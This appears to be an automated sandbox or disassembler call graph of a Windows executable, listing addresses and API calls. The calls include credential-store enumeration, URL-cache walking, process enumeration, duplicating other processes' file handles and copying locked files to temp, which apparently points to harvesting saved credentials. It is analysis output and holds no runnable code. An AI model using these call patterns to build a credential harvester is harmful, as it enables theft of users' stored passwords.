38960->38961 38962 40c7a0 38961->38962 39352 40c274 memset 38962->39352 38967 40a8ab 9 API calls 38968 40c7c3 38967->38968 38969 40a8ab 9 API calls 38968->38969 38970 40c7d0 38969->38970 39381 40c3c3 38970->39381 38974 40c877 38983 40bdb0 38974->38983 38975 40c86c 39423 4053fe 39 API calls 38975->39423 38981 40c7e5 38981->38974 38981->38975 38982 40c634 49 API calls 38981->38982 39406 40a706 38981->39406 38982->38981 39616 404363 38983->39616 38986 40bf5d 39636 40440c 38986->39636 38988 40bdee 38988->38986 38991 40b2cc 27 API calls 38988->38991 38989 40bddf CredEnumerateW 38989->38988 38992 40be02 wcslen 38991->38992 38992->38986 38999 40be1e 38992->38999 38993 40be26 _wcsncoll 38993->38999 38996 40be7d memset 38997 40bea7 memcpy 38996->38997 38996->38999 38998 40bf11 wcschr 38997->38998 38997->38999 38998->38999 38999->38986 38999->38993 38999->38996 38999->38997 38999->38998 39000 40b2cc 27 API calls 38999->39000 39002 40bf43 LocalFree 38999->39002 39639 40bd5d 28 API calls 38999->39639 39640 404423 38999->39640 39001 40bef6 _wcsnicmp 39000->39001 39001->38998 39001->38999 39002->38999 39003 4135f7 39653 4135e0 39003->39653 39006 40b2cc 27 API calls 39007 41360d 39006->39007 39037 40399d 39036->39037 39682 403a16 39037->39682 39040 403a12 wcsrchr 39040->38774 39043 4039a3 39044 4039f4 39043->39044 39046 403a09 39043->39046 39693 40a02c CreateFileW 39043->39693 39045 4099c6 2 API calls 39044->39045 39044->39046 39045->39046 39696 40b1ab ??3@YAXPAX ??3@YAXPAX 39046->39696 39048 414c2e 16 API calls 39047->39048 39049 404048 39048->39049 39050 414c2e 16 API calls 39049->39050 39051 404056 39050->39051 39052 409d1f 6 API calls 39051->39052 39053 404073 39052->39053 39054 409d1f 6 API calls 39053->39054 39055 40408e 39054->39055 39056 409d1f 6 API calls 39055->39056 39057 4040a6 39056->39057 39058 403af5 20 API calls 39057->39058 39059 4040ba 39058->39059 39060 403af5 20 API calls 39059->39060 39061 4040cb 39060->39061 39723 40414f memset 39061->39723 39063 404140 39737 40b1ab ??3@YAXPAX ??3@YAXPAX 39063->39737 39064 4040ec memset 39068 4040e0 39064->39068 39066 404148 39066->38826 39067 4099c6 2 API calls 39067->39068 39068->39063 39068->39064 39068->39067 39069 40a8ab 9 API calls 39068->39069 39069->39068 39750 40a6e6 WideCharToMultiByte 39070->39750 39072 4087ed 39751 4095d9 memset 39072->39751 39122 40b633 ??3@YAXPAX 39121->39122 39123 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39122->39123 39124 413f00 Process32NextW 39123->39124 39125 413da5 OpenProcess 39124->39125 39126 413f17 CloseHandle 39124->39126 39127 413eb0 39125->39127 39128 413df3 memset 39125->39128 39126->38866 39127->39124 39130 413ebf ??3@YAXPAX 39127->39130 39131 4099f4 3 API calls 39127->39131 39989 413f27 39128->39989 39130->39127 39131->39127 39133 413e37 GetModuleHandleW 39134 413e46 GetProcAddress 39133->39134 39135 413e1f 39133->39135 39134->39135 39135->39133 39994 413959 39135->39994 40010 413ca4 39135->40010 39137 413ea2 CloseHandle 39137->39127 39139 414c2e 16 API calls 39138->39139 39140 403eb7 39139->39140 39141 414c2e 16 API calls 39140->39141 39142 403ec5 39141->39142 39143 409d1f 6 API calls 39142->39143 39144 403ee2 39143->39144 39145 409d1f 6 API calls 39144->39145 39146 403efd 39145->39146 39147 409d1f 6 API calls 39146->39147 39148 403f15 39147->39148 39149 403af5 20 API calls 39148->39149 39150 403f29 39149->39150 39151 403af5 20 API calls 39150->39151 39152 403f3a 39151->39152 39153 40414f 33 API calls 39152->39153 39159 403f4f 39153->39159 39154 403faf 40024 40b1ab ??3@YAXPAX ??3@YAXPAX 39154->40024 39156 403f5b memset 39156->39159 39157 403fb7 39157->38812 39158 4099c6 2 API calls 39158->39159 39159->39154 39159->39156 39159->39158 39160 40a8ab 9 API calls 39159->39160 39160->39159 39162 414c2e 16 API calls 39161->39162 39163 403d26 39162->39163 39164 414c2e 16 API calls 39163->39164 39165 403d34 39164->39165 39166 409d1f 6 API calls 39165->39166 39167 403d51 39166->39167 39168 409d1f 6 API calls 39167->39168 39169 403d6c 39168->39169 39170 409d1f 6 API calls 39169->39170 39171 403d84 39170->39171 39172 403af5 20 API calls 39171->39172 39173 403d98 39172->39173 39174 403af5 20 API calls 39173->39174 39175 403da9 39174->39175 39176 40414f 33 API calls 39175->39176 39182 403dbe 39176->39182 39177 403e1e 40025 40b1ab ??3@YAXPAX ??3@YAXPAX 39177->40025 39178 403dca memset 39178->39182 39180 403e26 39180->38815 39181 4099c6 2 API calls 39181->39182 39182->39177 39182->39178 39182->39181 39183 40a8ab 9 API calls 39182->39183 39183->39182 39185 414b81 9 API calls 39184->39185 39186 414c40 39185->39186 39187 414c73 memset 39186->39187 40026 409cea 39186->40026 39190 414c94 39187->39190 39189 414c64 39189->38807 40029 414592 RegOpenKeyExW 39190->40029 39193 414cc1 39194 414cf4 wcscpy 39193->39194 40030 414bb0 wcscpy 39193->40030 39194->39189 39196 414cd2 40031 4145ac RegQueryValueExW 39196->40031 39198 414ce9 RegCloseKey 39198->39194 39200 409d62 39199->39200 39201 409d43 wcscpy 39199->39201 39200->38846 39202 409719 2 API calls 39201->39202 39203 409d51 wcscat 39202->39203 39203->39200 39205 40aebe FindClose 39204->39205 39206 40ae21 39205->39206 39207 4099c6 2 API calls 39206->39207 39208 40ae35 39207->39208 39209 409d1f 6 API calls 39208->39209 39210 40ae49 39209->39210 39210->38912 39212 40ade0 39211->39212 39213 40ae0f 39211->39213 39212->39213 39214 40ade7 wcscmp 39212->39214 39213->38912 39214->39213 39215 40adfe wcscmp 39214->39215 39215->39213 39217 40ae18 9 API calls 39216->39217 39223 4453c4 39217->39223 39218 40ae51 9 API calls 39218->39223 39219 4453f3 39220 40aebe FindClose 39219->39220 39222 4453fe 39220->39222 39221 40add4 2 API calls 39221->39223 39222->38912 39223->39218 39223->39219 39223->39221 39224 445403 253 API calls 39223->39224 39224->39223 39226 40ae7b FindNextFileW 39225->39226 39227 40ae5c FindFirstFileW 39225->39227 39228 40ae94 39226->39228 39229 40ae8f 39226->39229 39227->39228 39231 40aeb6 39228->39231 39232 409d1f 6 API calls 39228->39232 39230 40aebe FindClose 39229->39230 39230->39228 39231->38912 39232->39231 39234->38869 39235->38853 39236->38853 39237->38884 39239 409c89 39238->39239 39239->38908 39240->38937 39242 413d39 39241->39242 39243 413d2f FreeLibrary 39241->39243 39244 40b633 ??3@YAXPAX 39242->39244 39243->39242 39245 413d42 39244->39245 39246 40b633 ??3@YAXPAX 39245->39246 39247 413d4a 39246->39247 39247->38900 39248->38766 39249->38767 39250->38838 39252 44db70 39251->39252 39253 40b6fc memset 39252->39253 39254 409c70 2 API calls 39253->39254 39255 40b732 wcsrchr 39254->39255 39256 40b743 39255->39256 39257 40b746 memset 39255->39257 39256->39257 39258 40b2cc 27 API calls 39257->39258 39259 40b76f 39258->39259 39260 409d1f 6 API calls 39259->39260 39261 40b783 39260->39261 40032 409b98 GetFileAttributesW 39261->40032 39263 40b792 39264 409c70 2 API calls 39263->39264 39278 40b7c2 39263->39278 39266 40b7a5 39264->39266 39268 40b2cc 27 API calls 39266->39268 39273 40b7b2 39268->39273 39269 40b837 FindCloseChangeNotification 39272 40b83e memset 39269->39272 39270 40b817 40067 409a45 GetTempPathW 39270->40067 40066 40a6e6 WideCharToMultiByte 39272->40066 39276 409d1f 6 API calls 39273->39276 39274 40b827 CopyFileW 39274->39272 39276->39278 39277 40b866 39279 444432 121 API calls 39277->39279 40033 40bb98 39278->40033 39280 40b879 39279->39280 39281 40bad5 39280->39281 39282 40b273 27 API calls 39280->39282 39283 40baeb 39281->39283 39284 40bade DeleteFileW 39281->39284 39285 40b89a 39282->39285 39286 40b04b ??3@YAXPAX 39283->39286 39284->39283 39287 438552 134 API calls 39285->39287 39288 40baf3 39286->39288 39289 40b8a4 39287->39289 39288->38769 39290 40bacd 39289->39290 39292 4251c4 137 API calls 39289->39292 39291 443d90 111 API calls 39290->39291 39291->39281 39315 40b8b8 39292->39315 39293 40bac6 40079 424f26 123 API calls 39293->40079 39294 40b8bd memset 40070 425413 17 API calls 39294->40070 39297 425413 17 API calls 39297->39315 39300 40a71b MultiByteToWideChar 39300->39315 39301 40a734 MultiByteToWideChar 39301->39315 39304 40b9b5 memcmp 39304->39315 39305 4099c6 2 API calls 39305->39315 39306 404423 37 API calls 39306->39315 39309 4251c4 137 API calls 39309->39315 39310 40bb3e memset memcpy 40080 40a734 MultiByteToWideChar 39310->40080 39312 40bb88 LocalFree 39312->39315 39315->39293 39315->39294 39315->39297 39315->39300 39315->39301 39315->39304 39315->39305 39315->39306 39315->39309 39315->39310 39316 40ba5f memcmp 39315->39316 40071 4253ef 16 API calls 39315->40071 40072 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39315->40072 40073 4253af 17 API calls 39315->40073 40074 4253cf 17 API calls 39315->40074 40075 447280 memset 39315->40075 40076 447960 memset memcpy memcpy memcpy 39315->40076 40077 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39315->40077 40078 447920 memcpy memcpy memcpy 39315->40078 39316->39315 39317->38842 39319 40aed1 39318->39319 39320 40aec7 FindClose 39318->39320 39319->38778 39320->39319 39322 4099d7 39321->39322 39323 4099da memcpy 39321->39323 39322->39323 39323->38825 39325 40b2cc 27 API calls 39324->39325 39326 44543f 39325->39326 39327 409d1f 6 API calls 39326->39327 39328 44544f 39327->39328 40169 409b98 GetFileAttributesW 39328->40169 39330 445476 39333 40b2cc 27 API calls 39330->39333 39331 44545e 39331->39330 39332 40b6ef 252 API calls 39331->39332 39332->39330 39334 445482 39333->39334 39335 409d1f 6 API calls 39334->39335 39336 445492 39335->39336 40170 409b98 GetFileAttributesW 39336->40170 39338 4454a1 39339 4454b9 39338->39339 39340 40b6ef 252 API calls 39338->39340 39339->38851 39340->39339 39341->38850 39342->38874 39343->38880 39344->38915 39345->38896 39346->38940 39347->38940 39348->38926 39349->38956 39350->38958 39351->38960 39353 414c2e 16 API calls 39352->39353 39354 40c2ae 39353->39354 39424 40c1d3 39354->39424 39359 40c3be 39376 40a8ab 39359->39376 39360 40afcf 2 API calls 39361 40c2fd FindFirstUrlCacheEntryW 39360->39361 39362 40c3b6 39361->39362 39363 40c31e wcschr 39361->39363 39364 40b04b ??3@YAXPAX 39362->39364 39365 40c331 39363->39365 39366 40c35e FindNextUrlCacheEntryW 39363->39366 39364->39359 39367 40a8ab 9 API calls 39365->39367 39366->39363 39368 40c373 GetLastError 39366->39368 39371 40c33e wcschr 39367->39371 39369 40c3ad FindCloseUrlCache 39368->39369 39370 40c37e 39368->39370 39369->39362 39372 40afcf 2 API calls 39370->39372 39371->39366 39373 40c34f 39371->39373 39374 40c391 FindNextUrlCacheEntryW 39372->39374 39375 40a8ab 9 API calls 39373->39375 39374->39363 39374->39369 39375->39366 39540 40a97a 39376->39540 39379 40a8cc 39379->38967 39546 40b1ab ??3@YAXPAX ??3@YAXPAX 39381->39546 39383 40c3dd 39384 40b2cc 27 API calls 39383->39384 39385 40c3e7 39384->39385 39547 414592 RegOpenKeyExW 39385->39547 39387 40c3f4 39388 40c50e 39387->39388 39389 40c3ff 39387->39389 39403 405337 39388->39403 39390 40a9ce 4 API calls 39389->39390 39391 40c418 memset 39390->39391 39548 40aa1d 39391->39548 39394 40c471 39396 40c47a _wcsupr 39394->39396 39395 40c505 RegCloseKey 39395->39388 39550 40a8d0 7 API calls 39396->39550 39398 40c498 39551 40a8d0 7 API calls 39398->39551 39400 40c4ac memset 39401 40aa1d 39400->39401 39402 40c4e4 RegEnumValueW 39401->39402 39402->39395 39402->39396 39552 405220 39403->39552 39407 4099c6 2 API calls 39406->39407 39408 40a714 _wcslwr 39407->39408 39409 40c634 39408->39409 39609 405361 39409->39609 39412 40c65c wcslen 39612 4053b6 39 API calls 39412->39612 39413 40c71d wcslen 39413->38981 39415 40c677 39416 40c713 39415->39416 39613 40538b 39 API calls 39415->39613 39615 4053df 39 API calls 39416->39615 39419 40c6a5 39419->39416 39420 40c6a9 memset 39419->39420 39421 40c6d3 39420->39421 39614 40c589 43 API calls 39421->39614 39423->38974 39425 40ae18 9 API calls 39424->39425 39431 40c210 39425->39431 39426 40ae51 9 API calls 39426->39431 39427 40c264 39428 40aebe FindClose 39427->39428 39430 40c26f 39428->39430 39429 40add4 2 API calls 39429->39431 39436 40e5ed memset memset 39430->39436 39431->39426 39431->39427 39431->39429 39432 40c231 _wcsicmp 39431->39432 39433 40c1d3 35 API calls 39431->39433 39432->39431 39434 40c248 39432->39434 39433->39431 39449 40c084 22 API calls 39434->39449 39437 414c2e 16 API calls 39436->39437 39438 40e63f 39437->39438 39439 409d1f 6 API calls 39438->39439 39440 40e658 39439->39440 39450 409b98 GetFileAttributesW 39440->39450 39442 40e667 39443 40e680 39442->39443 39444 409d1f 6 API calls 39442->39444 39451 409b98 GetFileAttributesW 39443->39451 39444->39443 39446 40e68f 39448 40c2d8 39446->39448 39452 40e4b2 39446->39452 39448->39359 39448->39360 39449->39431 39450->39442 39451->39446 39473 40e01e 39452->39473 39454 40e593 39455 40e5b0 39454->39455 39456 40e59c DeleteFileW 39454->39456 39458 40b04b ??3@YAXPAX 39455->39458 39456->39455 39457 40e521 39457->39454 39496 40e175 39457->39496 39459 40e5bb 39458->39459 39461 40e5c4 CloseHandle 39459->39461 39462 40e5cc 39459->39462 39461->39462 39464 40b633 ??3@YAXPAX 39462->39464 39463 40e573 39466 40e584 39463->39466 39467 40e57c FindCloseChangeNotification 39463->39467 39465 40e5db 39464->39465 39469 40b633 ??3@YAXPAX 39465->39469 39539 40b1ab ??3@YAXPAX ??3@YAXPAX 39466->39539 39467->39466 39468 40e540 39468->39463 39516 40e2ab 39468->39516 39471 40e5e3 39469->39471 39471->39448 39474 406214 22 API calls 39473->39474 39475 40e03c 39474->39475 39476 40e16b 39475->39476 39477 40dd85 74 API calls 39475->39477 39476->39457 39478 40e06b 39477->39478 39478->39476 39479 40afcf ??2@YAPAXI ??3@YAXPAX 39478->39479 39480 40e08d OpenProcess 39479->39480 39481 40e0a4 GetCurrentProcess DuplicateHandle 39480->39481 39485 40e152 39480->39485 39482 40e0d0 GetFileSize 39481->39482 39483 40e14a CloseHandle 39481->39483 39486 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39482->39486 39483->39485 39484 40e160 39488 40b04b ??3@YAXPAX 39484->39488 39485->39484 39487 406214 22 API calls 39485->39487 39489 40e0ea 39486->39489 39487->39484 39488->39476 39490 4096dc CreateFileW 39489->39490 39491 40e0f1 CreateFileMappingW 39490->39491 39492 40e140 CloseHandle CloseHandle 39491->39492 39493 40e10b MapViewOfFile 39491->39493 39492->39483 39494 40e13b FindCloseChangeNotification 39493->39494 39495 40e11f WriteFile UnmapViewOfFile 39493->39495 39494->39492 39495->39494 39497 40e18c 39496->39497 39498 406b90 11 API calls 39497->39498 39499 40e19f 39498->39499 39500 40e1a7 memset 39499->39500 39501 40e299 39499->39501 39506 40e1e8 39500->39506 39502 4069a3 ??3@YAXPAX ??3@YAXPAX 39501->39502 39503 40e2a4 39502->39503 39503->39468 39504 406e8f 13 API calls 39504->39506 39505 406b53 SetFilePointerEx ReadFile 39505->39506 39506->39504 39506->39505 39507 40e283 39506->39507 39508 40dd50 _wcsicmp 39506->39508 39512 40742e 8 API calls 39506->39512 39513 40aae3 wcslen wcslen _memicmp 39506->39513 39514 40e244 _snwprintf 39506->39514 39509 40e291 39507->39509 39510 40e288 ??3@YAXPAX 39507->39510 39508->39506 39511 40aa04 ??3@YAXPAX 39509->39511 39510->39509 39511->39501 39512->39506 39513->39506 39515 40a8d0 7 API calls 39514->39515 39515->39506 39517 40e2c2 39516->39517 39518 406b90 11 API calls 39517->39518 39538 40e2d3 39518->39538 39519 40e4a0 39520 4069a3 ??3@YAXPAX ??3@YAXPAX 39519->39520 39522 40e4ab 39520->39522 39521 406e8f 13 API calls 39521->39538 39522->39468 39523 406b53 SetFilePointerEx ReadFile 39523->39538 39524 40e489 39525 40aa04 ??3@YAXPAX 39524->39525 39526 40e491 39525->39526 39526->39519 39527 40e497 ??3@YAXPAX 39526->39527 39527->39519 39528 40dd50 _wcsicmp 39528->39538 39529 40dd50 _wcsicmp 39530 40e376 memset 39529->39530 39531 40aa29 6 API calls 39530->39531 39531->39538 39532 40742e 8 API calls 39532->39538 39533 40e3e0 memcpy 39533->39538 39534 40e3b3 wcschr 39534->39538 39535 40e3fb memcpy 39535->39538 39536 40e416 memcpy 39536->39538 39537 40e431 memcpy 39537->39538 39538->39519 39538->39521 39538->39523 39538->39524 39538->39528 39538->39529 39538->39532 39538->39533 39538->39534 39538->39535 39538->39536 39538->39537 39539->39454 39542 40a980 39540->39542 39541 40a8bb 39541->39379 39545 40a8d0 7 API calls 39541->39545 39542->39541 39543 40a995 _wcsicmp 39542->39543 39544 40a99c wcscmp 39542->39544 39543->39542 39544->39542 39545->39379 39546->39383 39547->39387 39549 40aa23 RegEnumValueW 39548->39549 39549->39394 39549->39395 39550->39398 39551->39400 39553 405335 39552->39553 39554 40522a 39552->39554 39553->38981 39555 40b2cc 27 API calls 39554->39555 39556 405234 39555->39556 39557 40a804 8 API calls 39556->39557 39558 40523a 39557->39558 39597 40b273 39558->39597 39560 405248 _mbscpy _mbscat GetProcAddress 39561 40b273 27 API calls 39560->39561 39562 405279 39561->39562 39600 405211 GetProcAddress 39562->39600 39564 405282 39565 40b273 27 API calls 39564->39565 39566 40528f 39565->39566 39601 405211 GetProcAddress 39566->39601 39568 405298 39569 40b273 27 API calls 39568->39569 39570 4052a5 39569->39570 39598 40b58d 27 API calls 39597->39598 39599 40b18c 39598->39599 39599->39560 39600->39564 39601->39568 39610 405220 39 API calls 39609->39610 39611 405369 39610->39611 39611->39412 39611->39413 39612->39415 39613->39419 39614->39416 39615->39413 39617 40440c FreeLibrary 39616->39617 39618 40436d 39617->39618 39619 40a804 8 API calls 39618->39619 39620 404377 39619->39620 39621 404383 39620->39621 39622 404405 39620->39622 39623 40b273 27 API calls 39621->39623 39622->38986 39622->38988 39622->38989 39624 40438d GetProcAddress 39623->39624 39625 40b273 27 API calls 39624->39625 39626 4043a7 GetProcAddress 39625->39626 39627 40b273 27 API calls 39626->39627 39628 4043ba GetProcAddress 39627->39628 39629 40b273 27 API calls 39628->39629 39630 4043ce GetProcAddress 39629->39630 39631 40b273 27 API calls 39630->39631 39637 404413 FreeLibrary 39636->39637 39638 40441e 39636->39638 39637->39638 39638->39003 39639->38999 39641 40442e 39640->39641 39643 40447e 39640->39643 39642 40b2cc 27 API calls 39641->39642 39644 404438 39642->39644 39643->38999 39645 40a804 8 API calls 39644->39645 39654 4135f6 39653->39654 39655 4135eb FreeLibrary 39653->39655 39654->39006 39655->39654 39683 403a29 39682->39683 39697 403bed memset memset 39683->39697 39685 403ae7 39710 40b1ab ??3@YAXPAX ??3@YAXPAX 39685->39710 39686 403a3f memset 39691 403a2f 39686->39691 39688 403aef 39688->39043 39689 409d1f 6 API calls 39689->39691 39690 409b98 GetFileAttributesW 39690->39691 39691->39685 39691->39686 39691->39689 39691->39690 39692 40a8d0 7 API calls 39691->39692 39692->39691 39694 40a051 GetFileTime FindCloseChangeNotification 39693->39694 39695 4039ca CompareFileTime 39693->39695 39694->39695 39695->39043 39696->39040 39698 414c2e 16 API calls 39697->39698 39699 403c38 39698->39699 39700 409719 2 API calls 39699->39700 39701 403c3f wcscat 39700->39701 39702 414c2e 16 API calls 39701->39702 39703 403c61 39702->39703 39704 409719 2 API calls 39703->39704 39705 403c68 wcscat 39704->39705 39711 403af5 39705->39711 39708 403af5 20 API calls 39709 403c95 39708->39709 39709->39691 39710->39688 39712 403b02 39711->39712 39713 40ae18 9 API calls 39712->39713 39715 403b37 39713->39715 39714 40ae51 9 API calls 39714->39715 39715->39714 39716 403bdb 39715->39716 39717 40add4 wcscmp wcscmp 39715->39717 39720 40ae18 9 API calls 39715->39720 39721 40aebe FindClose 39715->39721 39722 40a8d0 7 API calls 39715->39722 39718 40aebe FindClose 39716->39718 39717->39715 39719 403be6 39718->39719 39719->39708 39720->39715 39721->39715 39722->39715 39724 409d1f 6 API calls 39723->39724 39725 404190 39724->39725 39738 409b98 GetFileAttributesW 39725->39738 39727 40419c 39728 4041a7 6 API calls 39727->39728 39729 40435c 39727->39729 39731 40424f 39728->39731 39729->39068 39731->39729 39732 40425e memset 39731->39732 39734 409d1f 6 API calls 39731->39734 39735 40a8ab 9 API calls 39731->39735 39739 414842 39731->39739 39732->39731 39733 404296 wcscpy 39732->39733 39733->39731 39734->39731 39736 4042b6 memset memset _snwprintf wcscpy 39735->39736 39736->39731 39737->39066 39738->39727 39742 41443e 39739->39742 39741 414866 39741->39731 39743 41444b 39742->39743 39744 414451 39743->39744 39745 4144a3 GetPrivateProfileStringW 39743->39745 39746 414491 39744->39746 39747 414455 wcschr 39744->39747 39745->39741 39749 414495 WritePrivateProfileStringW 39746->39749 39747->39746 39748 414463 _snwprintf 39747->39748 39748->39749 39749->39741 39750->39072 39752 40b2cc 27 API calls 39751->39752 39753 409615 39752->39753 39754 409d1f 6 API calls 39753->39754 39755 409625 39754->39755 39780 409b98 GetFileAttributesW 39755->39780 40016 413f4f 39989->40016 39992 413f37 K32GetModuleFileNameExW 39993 413f4a 39992->39993 39993->39135 39995 413969 wcscpy 39994->39995 39996 41396c wcschr 39994->39996 40000 413a3a 39995->40000 39996->39995 39998 41398e 39996->39998 40021 4097f7 wcslen wcslen _memicmp 39998->40021 40000->39135 40001 41399a 40002 4139a4 memset 40001->40002 40003 4139e6 40001->40003 40022 409dd5 GetWindowsDirectoryW wcscpy 40002->40022 40005 413a31 wcscpy 40003->40005 40006 4139ec memset 40003->40006 40005->40000 40023 409dd5 GetWindowsDirectoryW wcscpy 40006->40023 40007 4139c9 wcscpy wcscat 40007->40000 40009 413a11 memcpy wcscat 40009->40000 40011 413cb0 GetModuleHandleW 40010->40011 40012 413cda 40010->40012 40011->40012 40013 413cbf GetProcAddress 40011->40013 40014 413ce3 GetProcessTimes 40012->40014 40015 413cf6 40012->40015 40013->40012 40014->39137 40015->39137 40017 413f2f 40016->40017 40018 413f54 40016->40018 40017->39992 40017->39993 40019 40a804 8 API calls 40018->40019 40020 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40019->40020 40020->40017 40021->40001 40022->40007 40023->40009 40024->39157 40025->39180 40027 409cf9 GetVersionExW 40026->40027 40028 409d0a 40026->40028 40027->40028 40028->39187 40028->39189 40029->39193 40030->39196 40031->39198 40032->39263 40034 40bba5 40033->40034 40081 40cc26 40034->40081 40037 40bd4b 40102 40cc0c 40037->40102 40042 40b2cc 27 API calls 40043 40bbef 40042->40043 40109 40ccf0 _wcsicmp 40043->40109 40045 40bbf5 40045->40037 40110 40ccb4 6 API calls 40045->40110 40047 40bc26 40048 40cf04 17 API calls 40047->40048 40049 40bc2e 40048->40049 40050 40bd43 40049->40050 40051 40b2cc 27 API calls 40049->40051 40052 40cc0c 4 API calls 40050->40052 40053 40bc40 40051->40053 40052->40037 40111 40ccf0 _wcsicmp 40053->40111 40055 40bc46 40055->40050 40056 40bc61 memset memset WideCharToMultiByte 40055->40056 40112 40103c strlen 40056->40112 40058 40bcc0 40059 40b273 27 API calls 40058->40059 40060 40bcd0 memcmp 40059->40060 40060->40050 40061 40bce2 40060->40061 40062 404423 37 API calls 40061->40062 40063 40bd10 40062->40063 40063->40050 40064 40bd3a LocalFree 40063->40064 40065 40bd1f memcpy 40063->40065 40064->40050 40065->40064 40066->39277 40068 409a74 GetTempFileNameW 40067->40068 40069 409a66 GetWindowsDirectoryW 40067->40069 40068->39274 40069->40068 40070->39315 40071->39315 40072->39315 40073->39315 40074->39315 40075->39315 40076->39315 40077->39315 40078->39315 40079->39290 40080->39312 40113 4096c3 CreateFileW 40081->40113 40083 40cc34 40084 40cc3d GetFileSize 40083->40084 40085 40bbca 40083->40085 40086 40afcf 2 API calls 40084->40086 40085->40037 40093 40cf04 40085->40093 40087 40cc64 40086->40087 40114 40a2ef ReadFile 40087->40114 40089 40cc71 40115 40ab4a MultiByteToWideChar 40089->40115 40091 40cc95 FindCloseChangeNotification 40092 40b04b ??3@YAXPAX 40091->40092 40092->40085 40094 40b633 ??3@YAXPAX 40093->40094 40095 40cf14 40094->40095 40121 40b1ab ??3@YAXPAX ??3@YAXPAX 40095->40121 40097 40bbdd 40097->40037 40097->40042 40098 40cf1b 40098->40097 40100 40cfef 40098->40100 40122 40cd4b 40098->40122 40101 40cd4b 14 API calls 40100->40101 40101->40097 40103 40b633 ??3@YAXPAX 40102->40103 40104 40cc15 40103->40104 40105 40aa04 ??3@YAXPAX 40104->40105 40106 40cc1d 40105->40106 40168 40b1ab ??3@YAXPAX ??3@YAXPAX 40106->40168 40108 40b7d4 memset CreateFileW 40108->39269 40108->39270 40109->40045 40110->40047 40111->40055 40112->40058 40113->40083 40114->40089 40116 40ab6b 40115->40116 40120 40ab93 40115->40120 40117 40a9ce 4 API calls 40116->40117 40118 40ab74 40117->40118 40119 40ab7c MultiByteToWideChar 40118->40119 40119->40120 40120->40091 40121->40098 40123 40cd7b 40122->40123 40156 40aa29 6 API calls 40123->40156 40125 40cef5 40126 40aa04 ??3@YAXPAX 40125->40126 40127 40cefd 40126->40127 40127->40098 40128 40cd89 40128->40125 40157 40aa29 6 API calls 40128->40157 40130 40ce1d 40158 40aa29 6 API calls 40130->40158 40132 40ce3e 40133 40ce6a 40132->40133 40159 40abb7 wcslen memmove 40132->40159 40134 40ce9f 40133->40134 40162 40abb7 wcslen memmove 40133->40162 40165 40a8d0 7 API calls 40134->40165 40137 40ce56 40160 40aa71 wcslen 40137->40160 40139 40ce8b 40163 40aa71 wcslen 40139->40163 40140 40ceb5 40166 40a8d0 7 API calls 40140->40166 40143 40ce5e 40161 40abb7 wcslen memmove 40143->40161 40144 40ce93 40164 40abb7 wcslen memmove 40144->40164 40148 40cecb 40167 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40148->40167 40150 40cedd 40151 40aa04 ??3@YAXPAX 40150->40151 40152 40cee5 40151->40152 40153 40aa04 ??3@YAXPAX 40152->40153 40154 40ceed 40153->40154 40155 40aa04 ??3@YAXPAX 40154->40155 40155->40125 40156->40128 40157->40130 40158->40132 40159->40137 40160->40143 40161->40133 40162->40139 40163->40144 40164->40134 40165->40140 40166->40148 40167->40150 40168->40108 40169->39331 40170->39338 37536 44dea5 37537 44deb5 FreeLibrary 37536->37537 37538 44dec3 37536->37538 37537->37538 40180 4148b6 FindResourceW 40181 4148f9 40180->40181 40182 4148cf SizeofResource 40180->40182 40182->40181 40183 4148e0 LoadResource 40182->40183 40183->40181 40184 4148ee LockResource 40183->40184 40184->40181 37712 415304 ??3@YAXPAX 40185 441b3f 40195 43a9f6 40185->40195 40187 441b61 40368 4386af memset 40187->40368 40189 44189a 40190 442bd4 40189->40190 40191 4418e2 40189->40191 40192 4418ea 40190->40192 40370 441409 memset 40190->40370 40191->40192 40369 4414a9 12 API calls 40191->40369 40196 43aa20 40195->40196 40197 43aadf 40195->40197 40196->40197 40198 43aa34 memset 40196->40198 40197->40187 40199 43aa56 40198->40199 40200 43aa4d 40198->40200 40371 43a6e7 40199->40371 40379 42c02e memset 40200->40379 40205 43aad3 40381 4169a7 11 API calls 40205->40381 40206 43aaae 40206->40197 40206->40205 40221 43aae5 40206->40221 40207 43ac18 40210 43ac47 40207->40210 40383 42bbd5 memcpy memcpy memcpy memset memcpy 40207->40383 40211 43aca8 40210->40211 40384 438eed 16 API calls 40210->40384 40215 43acd5 40211->40215 40386 4233ae 11 API calls 40211->40386 40214 43ac87 40385 4233c5 16 API calls 40214->40385 40387 423426 11 API calls 40215->40387 40219 43ace1 40388 439811 163 API calls 40219->40388 40220 43a9f6 161 API calls 40220->40221 40221->40197 40221->40207 40221->40220 40382 439bbb 22 API calls 40221->40382 40223 43acfd 40228 43ad2c 40223->40228 40389 438eed 16 API calls 40223->40389 40225 43ad19 40390 4233c5 16 API calls 40225->40390 40227 43ad58 40391 44081d 163 API calls 40227->40391 40228->40227 40231 43add9 40228->40231 40395 423426 11 API calls 40231->40395 40232 43ae3a memset 40233 43ae73 40232->40233 40396 42e1c0 147 API calls 40233->40396 40234 43adab 40393 438c4e 163 API calls 40234->40393 40235 43ad6c 40235->40197 40235->40234 40392 42370b memset memcpy memset 40235->40392 40239 43adcc 40394 440f84 12 API calls 40239->40394 40240 43ae96 40397 42e1c0 147 API calls 40240->40397 40243 43aea8 40244 43aec1 40243->40244 40398 42e199 147 API calls 40243->40398 40246 43af00 40244->40246 40399 42e1c0 147 API calls 40244->40399 40246->40197 40249 43af1a 40246->40249 40250 43b3d9 40246->40250 40400 438eed 16 API calls 40249->40400 40255 43b3f6 40250->40255 40259 43b4c8 40250->40259 40251 43b60f 40251->40197 40459 4393a5 17 API calls 40251->40459 40254 43af2f 40401 4233c5 16 API calls 40254->40401 40441 432878 12 API calls 40255->40441 40257 43af51 40402 423426 11 API calls 40257->40402 40268 43b4f2 40259->40268 40447 42bbd5 memcpy memcpy memcpy memset memcpy 40259->40447 40261 43af7d 40403 423426 11 API calls 40261->40403 40265 43af94 40404 423330 11 API calls 40265->40404 40266 43b529 40449 44081d 163 API calls 40266->40449 40448 43a76c 21 API calls 40268->40448 40271 43afca 40405 423330 11 API calls 40271->40405 40272 43b47e 40276 43b497 40272->40276 40444 42374a memcpy memset memcpy memcpy memcpy 40272->40444 40273 43b544 40274 43b55c 40273->40274 40450 42c02e memset 40273->40450 40451 43a87a 163 API calls 40274->40451 40445 4233ae 11 API calls 40276->40445 